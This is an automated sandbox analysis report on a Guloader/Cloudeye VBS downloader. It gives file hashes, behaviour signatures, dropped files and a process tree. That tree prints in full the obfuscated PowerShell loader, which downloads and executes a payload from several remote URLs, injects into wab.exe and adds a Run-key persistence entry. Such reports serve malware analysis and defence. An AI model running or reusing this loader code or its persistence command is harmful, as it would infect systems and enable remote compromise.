Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    09-07-2024 18:54

General

  • Target

    b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs

  • Size

    102KB

  • MD5

    01c94fd161a6999247d5f39f63bdeecf

  • SHA1

    f5da84dd0df3da70aa7cc5167d3a870aec691bd8

  • SHA256

    b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79

  • SHA512

    ac62e8e35dff33dec16b4cb9faed77dbbe8e5b51d1576495d12aed0eb0ab81f92ae6af6087441e812a7ce9a102898ed4e5622e68b87c5d6b7b8d9999dd599a1d

  • SSDEEP

    3072:c4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvfCS5x:pt7SPReHd0WoT28faa+CS64mu8IQCtv/

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2692
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
        3⤵
          PID:2808
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3068
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
            4⤵
              PID:2384
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:1240
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2620
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1976

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        6abcb26f8bccc06ba812dbffc5933a96

        SHA1

        4305c908a01dd8059406a15e6b1daaeb7e20db61

        SHA256

        1da0c861ce504db27e0e764d019af6adf23d5987a9498ffc6446365030793a77

        SHA512

        30448bb88214cd2059ec7718ad9245d3eb0d86666ed7d2e2ff6fbe6bea582c65afe0e78c22a7aaf084b1efdc4e123eceb980ad0bf99eb7bb26aad8896e1ff2ba

      • C:\Users\Admin\AppData\Local\Temp\CabA8DF.tmp

        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      • C:\Users\Admin\AppData\Local\Temp\Tar6597.tmp

        Filesize

        181KB

        MD5

        4ea6026cf93ec6338144661bf1202cd1

        SHA1

        a1dec9044f750ad887935a01430bf49322fbdcb7

        SHA256

        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

        SHA512

        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      • C:\Users\Admin\AppData\Roaming\Coqueluche14.myx

        Filesize

        516KB

        MD5

        8e72b507dadf417f0f922a8cc04533d5

        SHA1

        d2fb1f560d46af90f009069855dc1f94179c5b6a

        SHA256

        84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c

        SHA512

        cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CKQ750OV55N18BSWUFGX.temp

        Filesize

        7KB

        MD5

        9e3cc2afba423713dce0862a1e7665d2

        SHA1

        0bdb1a8f2eb12e130479cc48a0c47ffb6626dcd4

        SHA256

        7a2b0a49611fee20dc9456e231b724c213e46a0526bb9f8a80f7603a293cd6e3

        SHA512

        baa44caf9146d6a84b1ba6a688a3f71c210eac4d6fdc3c84395f2c3211b8375e28520293f000595e4d7e2de2b974f02821a41e06fa3ec5490e1438dd58e47f2d

      • memory/1240-56-0x0000000001BE0000-0x0000000002B90000-memory.dmp

        Filesize

        15.7MB

      • memory/1240-54-0x0000000000B70000-0x0000000001BD2000-memory.dmp

        Filesize

        16.4MB

      • memory/2692-35-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

        Filesize

        9.6MB

      • memory/2692-27-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

        Filesize

        9.6MB

      • memory/2692-26-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

        Filesize

        9.6MB

      • memory/2692-23-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

        Filesize

        9.6MB

      • memory/2692-33-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

        Filesize

        9.6MB

      • memory/2692-22-0x0000000002390000-0x0000000002398000-memory.dmp

        Filesize

        32KB

      • memory/2692-34-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

        Filesize

        4KB

      • memory/2692-21-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

        Filesize

        2.9MB

      • memory/2692-20-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

        Filesize

        4KB

      • memory/2692-24-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

        Filesize

        9.6MB

      • memory/2692-25-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

        Filesize

        9.6MB

      • memory/2692-59-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

        Filesize

        9.6MB

      • memory/3068-36-0x00000000065F0000-0x00000000075A0000-memory.dmp

        Filesize

        15.7MB